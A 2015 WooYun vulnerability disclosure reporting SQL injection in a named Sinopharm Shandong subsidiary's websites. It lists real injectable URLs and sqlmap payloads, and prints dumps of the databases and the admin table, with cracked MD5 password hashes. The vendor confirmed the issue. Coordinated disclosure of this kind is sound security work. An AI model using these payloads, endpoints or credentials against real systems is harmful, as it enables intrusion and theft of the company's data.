当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0165869

漏洞标题:国药集团某公司n个SQL注入打包/百万数据/DBA权限可shell/影响多个站

相关厂商:国药集团

漏洞作者: 路人甲

提交时间:2015-12-30 10:37

修复时间:2016-01-22 11:14

公开时间:2016-01-22 11:14

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-30: 细节已通知厂商并且等待厂商处理中
2015-12-30: 厂商已经确认,细节仅向厂商公开
2016-01-09: 细节向核心白帽子及相关领域专家公开
2016-01-19: 细节向普通白帽子公开
2016-01-29: 细节向实习白帽子公开
2016-01-22: 细节向公众公开

简要描述:

详细说明:

目标站点:国药集团山东有限公司
在同一个服务器的站点:
主站:http://www.sinopharm-sd.com
国药控股网上订单系统:http://58.56.60.68:8009/websale/empLogin.aspx
OA系统:http://58.56.60.68:8088/yyoa/index.jsp
供货商:http://58.56.60.68/lxcx/tc_ghs_login.asp
电子药单查询系统:http://58.56.60.68/EYJ/querychkrpt.aspx
注入点无穷多啊:
http://www.sinopharm-sd.com/News.aspx?smallclassid=1
http://www.sinopharm-sd.com/About.aspx?smallclassid=8
http://www.sinopharm-sd.com/Tel.aspx?smallclassid=5
http://www.sinopharm-sd.com/Contact.aspx?smallclassid=14
http://www.sinopharm-sd.com/Map.aspx?smallclassid=19
http://www.sinopharm-sd.com/Yingpin.aspx?ID=13
http://www.sinopharm-sd.com/MedicinePage.aspx?smallclassid=40
http://www.sinopharm-sd.com/ifxinxi.aspx?cityid=2
来看看其中一个:http://www.sinopharm-sd.com/News.aspx?smallclassid=1
DBA权限,可以getshell

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: smallclassid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: smallclassid=1' AND 3824=3824 AND 'smgD'='smgD
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: smallclassid=1' AND 8739=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(120)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (8739=8739) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(107)+CHAR(113))) AND 'rBIx'='rBIx
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: smallclassid=1';WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind (comment)
    Payload: smallclassid=1' WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
current database:    'db_gykg'
current user is DBA:    True
available databases [10]:
[*] db_gykg
[*] EasyUiDB
[*] gksd_ghslx
[*] master
[*] model
[*] msdb
[*] mytest
[*] plusoft_test
[*] PresAudi_20100428
[*] tempdb


看看数据库:

Database: db_gykg
+---------------------+---------+
| Table               | Entries |
+---------------------+---------+
| dbo.article         | 39      |
| dbo.smallclass      | 38      |
| dbo.products        | 24      |
| dbo.bigclass        | 23      |
| dbo.site            | 18      |
| dbo.Sys_City        | 18      |
| dbo.resume          | 12      |
| dbo.partner         | 8       |
| dbo.link            | 6       |
| dbo.recruitment     | 6       |
| dbo.sys_pic         | 6       |
| dbo.admin           | 5       |
| dbo.viewnews        | 4       |
| dbo.Viewnewsbyorder | 4       |
| dbo.sys_style       | 3       |
| dbo.userhy          | 3       |
| dbo.admintype       | 2       |
| dbo.Message         | 2       |
+---------------------+---------+


Table: admin
[8 columns]
+-----------+----------+
| Column    | Type     |
+-----------+----------+
| admincity | int      |
| logintime | datetime |
| order     | int      |
| password  | nvarchar |
| roles     | varchar  |
| userid    | int      |
| username  | nvarchar |
| usertype  | nvarchar |
+-----------+----------+
Database: db_gykg
Table: admin
[4 entries]
+--------+---------------------------------------------------------+---------+----------+----------+--------------------------------------------+-----------+-----------+
| userid | roles                                                   | order   | username | usertype | password                                   | admincity | logintime |
+--------+---------------------------------------------------------+---------+----------+----------+--------------------------------------------+-----------+-----------+
| 1      | 1,2,3,4,5,6,7,8,10,11,12,13,14,15,16,17,18,19,32,33,40, | <blank> | admin    | 0        | 21232F297A57A5A743894A0E4A801FC3 (admin)   | 0         | NULL      |
| 8      | 20,21,22,23,24,25,26,27,43,                             | <blank> | jnadmin  | 0        | 2646419C347F33F3B8D6DB98B1B94A07 (jnadmin) | 1         | NULL      |
| 9      | 28,                                                     | <blank> | qdadmin  | 0        | 218E14D0D206162F8875D50D519F62CF (qdadmin) | 2         | NULL      |
| 10     | 35,36,37,38,39,41,                                      | <blank> | ytadmin  | 0        | 56EAB79040880107388A006E71192600 (ytadmin) | 5         | NULL      |
+--------+---------------------------------------------------------+---------+----------+----------+--------------------------------------------+-----------+-----------+


大数据量来了。

Database: gksd_ghslx
+------------------+---------+
| Table            | Entries |
+------------------+---------+
| dbo.TC_ghslx_mx  | 4043799 |
| dbo.user_log     | 1040537 |
| dbo.TC_ghsrk_mx  | 725890  |
| dbo.yh_lxpz      | 43231   |
| dbo.TC_kh        | 40545   |
| dbo.TC_kcqd      | 24471   |
| dbo.ypxx         | 16298   |
| dbo.yhxx         | 1846    |
| dbo.yh_group_not | 996     |
| dbo.yh_group_r   | 68      |
| dbo.pbcatedt     | 21      |
| dbo.pbcatfmt     | 20      |
| dbo.yhxx_ghs     | 20      |
| dbo.dict_owner   | 14      |
| dbo.TC_news      | 13      |
| dbo.yh_group     | 13      |
| dbo.admin_user   | 2       |
+------------------+---------+

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-12-30 11:11

厂商回复:

我们会尽快修复

最新状态:

暂无

漏洞评价:

评价